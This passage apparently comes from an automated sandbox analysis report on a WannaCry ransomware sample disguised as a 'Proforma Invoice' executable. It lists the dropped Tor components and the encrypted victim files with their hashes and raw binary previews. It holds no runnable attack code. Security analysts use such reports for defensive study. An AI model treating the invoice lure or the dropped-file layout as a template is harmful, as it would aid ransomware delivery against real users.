                                                          SHA1:C9B29BA7E8A97729C46143CC59332D7A7E9C1AD8
                                                          SHA-256:58BE53D5012B3F45C1CA6F4897BECE4773EFBE1CCBF0BE460061C183EE14CA19
                                                          SHA-512:3BC462D21BC762F6EEC3D23BB57E2BAF532807AB8B46FAB1FE38A841E5FDE81ED446E5305A78AD0D513D85419E6EC8C4B54985DA1D6B198ACB793230AEECD93E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......... ........!.....J... ..0...........`.....c..........................!.......0...@... .........................A....`..\.......<.......................h...................................................4c...............................text....H.......J..................`.p`.data...\d...`...f...P..............@.`..rdata..............................@.`@.bss.........p........................`..edata..A............V..............@.0@.idata..\....`......................@.0..CRT....,...........................@.0..tls.... ............ ..............@.0..rsrc...<............"..............@.0..reloc..h............(..............@.0B/4............ ......& .............@.@B/19.....;z.... ..|...( .............@..B/31.....`....@!....... .............@..B/45.....'....`!....... .............@..B/57...........!....... .............@.0B/70.....".....!....... .

                                                          C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):719217
                                                          Entropy (8bit):5.981438230537172
                                                          Encrypted:false
                                                          SSDEEP:6144:Ir2r5rFriGKbgai112Yq/5hcQTcGzAHzSHeqoftOEEdD4B2pihSpKOKm:naiV25uQTcGzAHOEW+Pzm
                                                          MD5:90F50A285EFA5DD9C7FDDCE786BDEF25
                                                          SHA1:54213DA21542E11D656BB65DB724105AFE8BE688
                                                          SHA-256:77A250E81FDAF9A075B1244A9434C30BF449012C9B647B265FA81A7B0DB2513F
                                                          SHA-512:746422BE51031CFA44DD9A6F3569306C34BBE8ABF9D2BD1DF139D9C938D0CBA095C0E05222FD08C8B6DEAEBEF5D3F87569B08FB3261A2D123D983517FB9F43AE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........t.........!.....@...................P.....e......................... ............@... ......................P..4H......................................t+.....................................................4............................text...T?.......@..................`.P`.data........P.......F..............@.`..rdata.. ....`.......J..............@.`@.bss.........0........................`..edata..4H...P...J..................@.0@.idata...............X..............@.0..CRT....,............h..............@.0..tls.... ............j..............@.0..reloc..t+.......,...l..............@.0B/4..................................@.@B/19.................................@..B/31......(.......*...|..............@..B/45.....1*... ...,..................@..B/57..........P......................@.0B/70.....v....p......................@..B/81....................

                                                          C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):417759
                                                          Entropy (8bit):5.853358941151938
                                                          Encrypted:false
                                                          SSDEEP:6144:g8r2rQrFr0XGXnZ7rvzRsiWqnjmYl5oHIH9A:gtXGJnvmiggA
                                                          MD5:E5DF3824F2FCAD0C75FD601FCF37EE70
                                                          SHA1:902418A4C5F3684DBA5E3246DE8C4E21C92D674E
                                                          SHA-256:5CD126B4F8C77BDF0C5C980761A9C84411586951122131F13B0640DB83F792D8
                                                          SHA-512:7E70889B46B54175C6BADA7F042F5730CA7E3D156F7B6711FDF453911E4F78D64A2A8769EB8F0E33E826A3B30E623B3CD4DAF899D9D74888BB3051F08CF34461
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........k......!.....`...4...............p.....b......................................@... ..............................@...............................p...............................`......................pB...............................text...._.......`..................`.P`.data........p.......f..............@.`..rdata..xr.......t...j..............@.`@.bss..................................`..edata...........0..................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..reloc.......p....... ..............@.0B/4......P............:..............@.@B/19.................>..............@..B/31..........0......................@..B/45..........P......................@..B/57.....<....p......................@.0B/70....."...........................@..B/81.....B...............

                                                          C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):411369
                                                          Entropy (8bit):5.909395689751269
                                                          Encrypted:false
                                                          SSDEEP:3072:oLQzG3CaDYuKCsZW9p2M8suCOSNKOM0LE5BtBsxvQkVgA2+FOYtLEgZEVPSm0aQY:oWHMACLoYaQ2bj+b0pJ
                                                          MD5:6D6602388AB232CA9E8633462E683739
                                                          SHA1:41072CC983568D8FEEB3E18C4B74440E9D44019A
                                                          SHA-256:957D58061A42CA343064EC5FB0397950F52AEDF0594A18867D1339D5FBB12E7E
                                                          SHA-512:B37BF121EA20FFC16AF040F8797C47FA8588834BC8A8115B45DB23EE5BFBEBCD1E226E9ACAB67B5EE43629A255FEA2CEEE4B3215332DD4127F187EE10244F1C3
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........b.........!...............................l......................... ............@... .................................................................h...................................................L................................text...............................`.P`.data...............................@.`..rdata..DR... ...T..................@.`@.bss..................................`..edata...............T..............@.0@.idata...............p..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..h...........................@.0B/4......8...........................@.@B/19.....W.... ......................@..B/31......%.......&...v..............@..B/45......&...0...(..................@..B/57..........`......................@.0B/70.....v....p......................@..B/81.....................

                                                          C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):523262
                                                          Entropy (8bit):5.7796587531390795
                                                          Encrypted:false
                                                          SSDEEP:6144:+ymz8Jq1p95avGpuO+/jUE8ADu2kNBMY8KHNygoB0+6tMqSsVwvN:+ylSZ+/jU7ynIK5Bb6Y
                                                          MD5:73D4823075762EE2837950726BAA2AF9
                                                          SHA1:EBCE3532ED94AD1DF43696632AB8CF8DA8B9E221
                                                          SHA-256:9AECCF88253D4557A90793E22414868053CAAAB325842C0D7ACB0365E88CD53B
                                                          SHA-512:8F4A65BD35ED69F331769AAF7505F76DD3C64F3FA05CF01D83431EC93A7B1331F3C818AC7008E65B6F1278D7E365ED5940C8C6B8502E77595E112F1FACA558B5
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.....B...p...............`.....l.........................p......5(....@... .................................l....................................................................................................................text...X@.......B..................`.P`.data...8....`.......H..............@.0..rdata..<....p.......J..............@.`@.bss..................................`..edata...............Z..............@.0@.idata..l............f..............@.0..CRT....,............l..............@.0..tls.... ............n..............@.0..reloc...............p..............@.0B/4...................v..............@.@B/19.....Du.......v..................@..B/31....._o...p...p..................@..B/45..................l..............@..B/57.....|-...p......................@.0B/70.....J...........................@..B/81.................(..

                                                          C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):92599
                                                          Entropy (8bit):5.351249974009154
                                                          Encrypted:false
                                                          SSDEEP:1536:pEiL38qIuOFcErNX5d0tRCZiBP2DrbjgpfM2ydbv:aiLsqIHFPpdiU2q
                                                          MD5:78581E243E2B41B17452DA8D0B5B2A48
                                                          SHA1:EAEFB59C31CF07E60A98AF48C5348759586A61BB
                                                          SHA-256:F28CAEBE9BC6AA5A72635ACB4F0E24500494E306D8E8B2279E7930981281683F
                                                          SHA-512:332098113CE3F75CB20DC6E09F0D7BA03F13F5E26512D9F3BEE3042C51FBB01A5E4426C5E9A5308F7F805B084EFC94C28FC9426CE73AB8DFEE16AB39B3EFE02A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.........4...............0.....h................................<.....@... ......................`..i....p..................................@....................................................q...............................text...............................`.P`.data........0......."..............@.0..rdata..h....@.......$..............@.0@.bss.........P........................`..edata..i....`.......*..............@.0@.idata.......p.......,..............@.0..CRT....,............2..............@.0..tls.... ............4..............@.0..reloc..@............6..............@.0B/4...................:..............@.@B/19.....n|.......~...<..............@..B/31..........@......................@..B/45..........`......................@..B/57.....$...........................@.0B/70....."...........................@..B/81.....w...............

                                                          C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):711459
                                                          Entropy (8bit):5.884120014912355
                                                          Encrypted:false
                                                          SSDEEP:12288:hXhKnXI0Fkw80VEJtzwIA6Ouah6ESyrWlp36Z:thKnnkw80VEJtzwIAiazSxlFw
                                                          MD5:A12C2040F6FDDD34E7ACB42F18DD6BDC
                                                          SHA1:D7DB49F1A9870A4F52E1F31812938FDEA89E9444
                                                          SHA-256:BD70BA598316980833F78B05F7EEAEF3E0F811A7C64196BF80901D155CB647C1
                                                          SHA-512:FBE0970BCDFAA23AF624DAAD9917A030D8F0B10D38D3E9C7808A9FBC02912EE9DAED293DBDEA87AA90DC74470BC9B89CB6F2FE002393ECDA7B565307FFB7EC00
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........p..y .....!..............................@n......................... .......4....@... ......................0..m)...`...4......<.......................85..................................................,g...............................text...............................`.P`.data....-..........................@.`..rdata.......@.......0..............@.`@.bss....d.... ........................`..edata..m)...0...*..................@.0@.idata...4...`...6...6..............@.0..CRT....,............l..............@.0..tls.... ............n..............@.0..rsrc...<............p..............@.0..reloc..85.......6...v..............@.0B/4..................................@.@B/19.....n|... ...~..................@..B/31..................,..............@..B/45..................B..............@..B/57.....$............T..............@.0B/70....."............\..

                                                          C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3098624
                                                          Entropy (8bit):6.512654975680739
                                                          Encrypted:false
                                                          SSDEEP:49152:5m9/gUvHrLaQ4Dt4PC+3xhae2cQX7E5zNvQIJZW/1h4+o4:MiuLSDt2C+3baAQX7ETQIr+h4+o
                                                          MD5:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                                          SHA1:53912D33BEC3375153B7E4E68B78D66DAB62671A
                                                          SHA-256:E48673680746FBE027E8982F62A83C298D6FB46AD9243DE8E79B7E5A24DCD4EB
                                                          SHA-512:8AC6DC5BB016AFC869FCBB713F6A14D3692E866B94F4F1EE83B09A7506A8CB58768BD47E081CF6E97B2DACF9F9A6A8CA240D7D20D0B67DBD33238CC861DEAE8F
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Cm8..................#..D/..H............#...@.........................../......./...@... .............................. ...2..............................D]...........................p.......................'...............................text...t.#.......#.................`.P`.data.........#.......#.............@.`..rdata........$.......$.............@.`@.bss....`G....-.......................`..idata...2... ...4....-.............@.0..CRT....4....`........-.............@.0..tls.... ....p........-.............@.0..reloc..D].......^....-.............@.0B................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\Desktop\TaskData\Tor\tor.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3098624
                                                          Entropy (8bit):6.512654975680739
                                                          Encrypted:false
                                                          SSDEEP:49152:5m9/gUvHrLaQ4Dt4PC+3xhae2cQX7E5zNvQIJZW/1h4+o4:MiuLSDt2C+3baAQX7ETQIr+h4+o
                                                          MD5:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                                          SHA1:53912D33BEC3375153B7E4E68B78D66DAB62671A
                                                          SHA-256:E48673680746FBE027E8982F62A83C298D6FB46AD9243DE8E79B7E5A24DCD4EB
                                                          SHA-512:8AC6DC5BB016AFC869FCBB713F6A14D3692E866B94F4F1EE83B09A7506A8CB58768BD47E081CF6E97B2DACF9F9A6A8CA240D7D20D0B67DBD33238CC861DEAE8F
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Cm8..................#..D/..H............#...@.........................../......./...@... .............................. ...2..............................D]...........................p.......................'...............................text...t.#.......#.................`.P`.data.........#.......#.............@.`..rdata........$.......$.............@.`@.bss....`G....-.......................`..idata...2... ...4....-.............@.0..CRT....4....`........-.............@.0..tls.... ....p........-.............@.0..reloc..D].......^....-.............@.0B................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\Desktop\TaskData\Tor\zlib1.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):107520
                                                          Entropy (8bit):6.440165833134522
                                                          Encrypted:false
                                                          SSDEEP:1536:NlN3sTKU7xniaO9ADje81EQ3aL8WNdUCqfRnToIfBoIONIOqbW+xCvETe:DpsmU7xaiDjeJL5qf5TBfgHqbdxCv6e
                                                          MD5:FB072E9F69AFDB57179F59B512F828A4
                                                          SHA1:FE71B70173E46EE4E3796DB9139F77DC32D2F846
                                                          SHA-256:66D653397CBB2DBB397EB8421218E2C126B359A3B0DECC0F31E297DF099E1383
                                                          SHA-512:9D157FECE0DC18AFE30097D9C4178AE147CC9D465A6F1D35778E1BFF1EFCA4734DD096E95D35FAEA32DA8D8B4560382338BA9C6C40F29047F1CC0954B27C64F8
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....&...................@.....b......................... ...........@... .....................................................................................................................$................................text...d$.......&..................`.P`.data...X....@.......*..............@.0..rdata..pW...P...X...,..............@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                                          C:\Users\user\Desktop\VWDFPKGDUF.jpg

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.781903416547841
                                                          Encrypted:false
                                                          SSDEEP:24:NJwF4RCj5CFxuZH/0DKgOIyN6QPjkjxq+hUka/BZ3wg4H5:s6aCFEx/0DKkydkjxJG5igO
                                                          MD5:138921DC4C06A0C0D51DE9C1E2D18DDD
                                                          SHA1:58F0ACCE36B48CB588BD58F8D8D6CEC44E44AA43
                                                          SHA-256:729533A90737FF489AA8202EF7261C09FA508976E8AFE50C664710B60401EDAC
                                                          SHA-512:D064454BFC605C39D78C1AD784EB4EE28C4399FF3B5443C7B4E571FC329ADAC87C350B09BB6D88311245E8735326651A6E71BA47D3A688D1B12976340012A4A0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:".<]_...(..*...U#..Z,.rqq.M.$.{....E.....m...>..4...b5j..Iz...*Nj.#~M....>U.(...7...+..7...}.}E.,.......|.IL.........E'..%..y>r...=..7.P.mQ.5...i.....e...PQR ... .;...k=.p....&....kf...#...7.0-.n!..gA...._.Y...rg......:....+...=j.....$.......F_,.....[......x.K....HC......Hw.qj.P{.{..bLH.m.../.O.rM.....sh..O.{..:..."m...r.03..).n..o..,..U..Q.F%..o.F..Q.V".]g..b..V...&A`..ri.k..."&...l.?.U...C....,.A..Z...C..#.....(...,...c.<)...20......r..j.v.c.E.h.T.....5..e...p.s,XT.w.O<.43.0.u....s..R..3.T.....u..R..g/_Gq..E.HNAUVH.D.Y..r.g...D..I....T1...]..4j..EA...:.....\t5..`..Z]..;6!I40.+lg.)..h.Q/.K.......!...X.o7p..wb...L:XCH.....mxg..U...(.7b.4....t.l...W\6R..._...y.(.?.V....>.eDCV....W..b....~...)yH.C..I@o..HL.I......{u.._.5..'!$M..e..|.E.~...?{.Ix+Q.".$n....)...L.t.4g >..L*$}..w...c.O...o].!....>.vW...p..3..%..\1w....T.R.6.....?..h%*......%.~ag....*.>.w.......n..w....R2.y.).{j.g..kv...j.V....n4^7.b..b..$..f...hP.^...8...C=....1.D.$...:S...J]7.)...,x

                                                          C:\Users\user\Desktop\VWDFPKGDUF.jpg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.826346487415205
                                                          Encrypted:false
                                                          SSDEEP:24:bkkMeLwH8mUVieD4tpRqWUlIfuE0ppv1qRyQva7jzACjQniGwc8nKMTCgXDOHQ:bk7bUceD4boAuZrvIRyQvSjzA6Qi7c8D
                                                          MD5:1386AB54FD58EEE01E84A21D3A65EC60
                                                          SHA1:23261A6A3C5BF7D7DA2DAE535898C8246319D533
                                                          SHA-256:7D6230A3C1DCBEE56AAE93893E19A8A8AA33F34018660562567EA5C38AA8A230
                                                          SHA-512:2397EC58730AD63D0C7F423C8D3B06BC1236E8F676E9D0C8A20CE118387EC0296FDEE8952F6BD87A98641851B7F56BD59AA5180A158F6F03E9C70F6EFD870768
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........$.....(y.ik....@{3..X.K.d.. =.uQ..8...3....I...".(....b._...."....].=!z.o7...x......\{q.?.i.e..3..l.gX..ItD..-SP8.e]9..,'..^.<P90PU`.yQ...u?l.z.."#`..-.r].'..>!'.z ...<...A.;...Xi.....:z..L...3.....G.5..j=:[...@P.y..Eqb......tG.Y...................\7x....v..b.J...H.0....^.-nw.!5".G...7AM...E....U.~.).?...?\s.-..zpw.....<.SJ.........*6.b.....$..vn{./.5%.....5.o..6...b...:......'..G.>...&.#P....a....*..,....Sm#.p.>.....7..^..#..;[9Q.Cp...+...q......g[._@....IwBmY..R.......<.'u...JBX..J.....6...u..*.X^.hbl....H.w}.a4...R...O *......Y..V..q1...;...l....9.-....^...;."m..$.7..D...T3.D.R.Z.vY.}.T.l...... .Q.<..r,.. ....O.VU..K\......q[.@.....6.D....|..L...Y.|1...'..'F..g....Q.q..$.......X..y-|>~...:7.U......M.'...~.-K...u...w..H..#9;.D.E....9<..X].>.Q.......7.....F?Sp8....a.....8.-..;&....V.....B......t).EPaaz..m.[......=L....S...q.6.Ry(...C0S!8gq.k.^...4...,.....j..N.00fn..kkD!4[.\.U.U..W........5^.k..f.{...e\g.as....mg...r.*.

                                                          C:\Users\user\Desktop\VWDFPKGDUF.jpg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.826346487415205
                                                          Encrypted:false
                                                          SSDEEP:24:bkkMeLwH8mUVieD4tpRqWUlIfuE0ppv1qRyQva7jzACjQniGwc8nKMTCgXDOHQ:bk7bUceD4boAuZrvIRyQvSjzA6Qi7c8D
                                                          MD5:1386AB54FD58EEE01E84A21D3A65EC60
                                                          SHA1:23261A6A3C5BF7D7DA2DAE535898C8246319D533
                                                          SHA-256:7D6230A3C1DCBEE56AAE93893E19A8A8AA33F34018660562567EA5C38AA8A230
                                                          SHA-512:2397EC58730AD63D0C7F423C8D3B06BC1236E8F676E9D0C8A20CE118387EC0296FDEE8952F6BD87A98641851B7F56BD59AA5180A158F6F03E9C70F6EFD870768
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........$.....(y.ik....@{3..X.K.d.. =.uQ..8...3....I...".(....b._...."....].=!z.o7...x......\{q.?.i.e..3..l.gX..ItD..-SP8.e]9..,'..^.<P90PU`.yQ...u?l.z.."#`..-.r].'..>!'.z ...<...A.;...Xi.....:z..L...3.....G.5..j=:[...@P.y..Eqb......tG.Y...................\7x....v..b.J...H.0....^.-nw.!5".G...7AM...E....U.~.).?...?\s.-..zpw.....<.SJ.........*6.b.....$..vn{./.5%.....5.o..6...b...:......'..G.>...&.#P....a....*..,....Sm#.p.>.....7..^..#..;[9Q.Cp...+...q......g[._@....IwBmY..R.......<.'u...JBX..J.....6...u..*.X^.hbl....H.w}.a4...R...O *......Y..V..q1...;...l....9.-....^...;."m..$.7..D...T3.D.R.Z.vY.}.T.l...... .Q.<..r,.. ....O.VU..K\......q[.@.....6.D....|..L...Y.|1...'..'F..g....Q.q..$.......X..y-|>~...:7.U......M.'...~.-K...u...w..H..#9;.D.E....9<..X].>.Q.......7.....F?Sp8....a.....8.-..;&....V.....B......t).EPaaz..m.[......=L....S...q.6.Ry(...C0S!8gq.k.^...4...,.....j..N.00fn..kkD!4[.\.U.U..W........5^.k..f.{...e\g.as....mg...r.*.

                                                          C:\Users\user\Desktop\VWDFPKGDUF.xlsx

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:OpenPGP Secret Key
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.822260955936933
                                                          Encrypted:false
                                                          SSDEEP:24:HPGS449pt+NJyiboBS25pudmcNi4iXiokyDHcvfxh3Yxxv:v5Npt+2iboBS4Emcn9vfxhYx9
                                                          MD5:70FA554C53C2C424249803CB46D85B9B
                                                          SHA1:823E10932676820CBB1BE60ABCC49697DF810618
                                                          SHA-256:B9859F7E32BA78D82CA907ED5A2AA6AFB6E051D52E85FEBCF8561C8C091DA7DB
                                                          SHA-512:79CDBA0D506328AD62DE24231D4B035C73ADDEFDB1ED938FF7C1857B62738F42185565B1260E89C5755BB6F8ED674267BCC7562BD9157F8F1A09730CCA97A663
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.k.z....Y......'MW.l*.....n?....H.)..F.IR.]..A......... .\..nn..^..QA+.vL..wl..\H....L.;.c.|..<........gecm....tZ9.M...y....;.=m{....e./.9.y...g......c.!...hk.!......vbu...Ro.o...O..N.e.'K......f.....E..*.jnh.].R.V..Z.....@...........k/...p....".zt...r...a.>,.....C....Aso .2..o.Ta....l1%.........H..(Wq..^.f..8.).....2...U..ULS..q_x..9...{.8.....D...8.9.^r~<^.....s....*.G..8fu@P...;..i.....>q.......&y\B{b...X1p....:....!.1D(.".p....d........u..`?....".0v....P5.ZC!..w...5@V..|&.=.).G\Dn.w..M.83...F|...jL.n.>..z....Z5.@=x..-.......U..~.......B..Z...e].J.L.?juo..S.|.CNz...6..t<.o.....1........z.M:g.z...+.._.....L........v.@..."....y#.....>...$.....v]....8Y....w..<........fB.L.u2.C...,....y....Q.C.U$....C.s....d....%...$9...H..T.E.A.u......J.-......F&..eY.D[.....;K..a,PC,..A...W.k(R.!]]8.H...S,........m.li..uv...; c{..g......'qe.3/C&Jit.....-.vK..D`..h.?....2Jo.B.7z.P..8.......TIZ.U...lH...G....*..O.$..*.30+.....s..}....r...A.<.Z.........%9.-.V.'.#

                                                          C:\Users\user\Desktop\VWDFPKGDUF.xlsx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.861894575548728
                                                          Encrypted:false
                                                          SSDEEP:24:bkgRXSVpBSzKD7Uk96smCZOV5I4jcfIfVpi1kZmv69lxgSXCwuMNRnIMswJJ:bkgRIr6QQk96p5vXjGZ1P6DWSSwuMNRX
                                                          MD5:0E7914D4B15FDDE9D81FD03C6788AFEF
                                                          SHA1:2AFFCEDE5DBA2921F534666B1CF5155D75237DEA
                                                          SHA-256:6B9A5C8CFC26DFCB8BCFFACC99B0C71206DDDC62C1BD3780C936B3D353BF95EA
                                                          SHA-512:F96EBAB960785F721391232FCEF9C0EDA5988C1394D461112F8AE17A2DCECE521664454B219A5E5759460E377F17DD86D1F52008CCB670200B93A66BE9B6303B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......]Dn.-..c.-.>......u&YC.._...w[...I..d..%...mu+...q!Fw...h~"....;.n...........U;..u~.z..fO....E.].$v......E~f.T...2.d...-&_...q....\.*.Q..f.,_@.T..S..jWE..b.W..].....-4y.RTyA..Y.JYN.c>.>.p.\E.)%q~}.x..v.?.b}!.r..BAo%......Ac.;x.]..d.%..I,u.O.m....................Fy. ..x.;?.B'..........w.........>..o..V....$..%t.....hM_.....d..#..Z....{.u........o..k...=..H.b2.............qu.,...p.}.hrZ.`.w..(..n>.9.+.[...5.$......z..Y..|.i.LZM...h}......j.oI<.;.Q.%.x...e]......{J.#.My.w..7.....Q..Ko..sX..o..u......g.a.;>..B.Y..;.Gx....^.S\...z..`.........VO..b.t.3....7..Wy.....8....Q.T.{....p..V.*...A......r.4)....jZ.j....`...i...Ba..@..B....|.ET4/... #..fnc...I@....t.....E.Oa....5]...Y......MI........_........@../.....z..=.L.L^9...#%.....Rg...LP....bZW.:.u.K....|...Gh.....d...R.I.....Q. .z...w........k.z.../...^..i...........u..[L..8.|...X......|.1).......nP...qP.}... m..]8...L-.Z.:..".6.(..<..@HyYG.f.9.5........2:...m..*.,...Q9[.. ..\NW.^....)..

                                                          C:\Users\user\Desktop\VWDFPKGDUF.xlsx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.861894575548728
                                                          Encrypted:false
                                                          SSDEEP:24:bkgRXSVpBSzKD7Uk96smCZOV5I4jcfIfVpi1kZmv69lxgSXCwuMNRnIMswJJ:bkgRIr6QQk96p5vXjGZ1P6DWSSwuMNRX
                                                          MD5:0E7914D4B15FDDE9D81FD03C6788AFEF
                                                          SHA1:2AFFCEDE5DBA2921F534666B1CF5155D75237DEA
                                                          SHA-256:6B9A5C8CFC26DFCB8BCFFACC99B0C71206DDDC62C1BD3780C936B3D353BF95EA
                                                          SHA-512:F96EBAB960785F721391232FCEF9C0EDA5988C1394D461112F8AE17A2DCECE521664454B219A5E5759460E377F17DD86D1F52008CCB670200B93A66BE9B6303B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......]Dn.-..c.-.>......u&YC.._...w[...I..d..%...mu+...q!Fw...h~"....;.n...........U;..u~.z..fO....E.].$v......E~f.T...2.d...-&_...q....\.*.Q..f.,_@.T..S..jWE..b.W..].....-4y.RTyA..Y.JYN.c>.>.p.\E.)%q~}.x..v.?.b}!.r..BAo%......Ac.;x.]..d.%..I,u.O.m....................Fy. ..x.;?.B'..........w.........>..o..V....$..%t.....hM_.....d..#..Z....{.u........o..k...=..H.b2.............qu.,...p.}.hrZ.`.w..(..n>.9.+.[...5.$......z..Y..|.i.LZM...h}......j.oI<.;.Q.%.x...e]......{J.#.My.w..7.....Q..Ko..sX..o..u......g.a.;>..B.Y..;.Gx....^.S\...z..`.........VO..b.t.3....7..Wy.....8....Q.T.{....p..V.*...A......r.4)....jZ.j....`...i...Ba..@..B....|.ET4/... #..fnc...I@....t.....E.Oa....5]...Y......MI........_........@../.....z..=.L.L^9...#%.....Rg...LP....bZW.:.u.K....|...Gh.....d...R.I.....Q. .z...w........k.z.../...^..i...........u..[L..8.|...X......|.1).......nP...qP.}... m..]8...L-.Z.:..".6.(..<..@HyYG.f.9.5........2:...m..*.,...Q9[.. ..\NW.^....)..

                                                          C:\Users\user\Desktop\WSHEJMDVQC.png

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
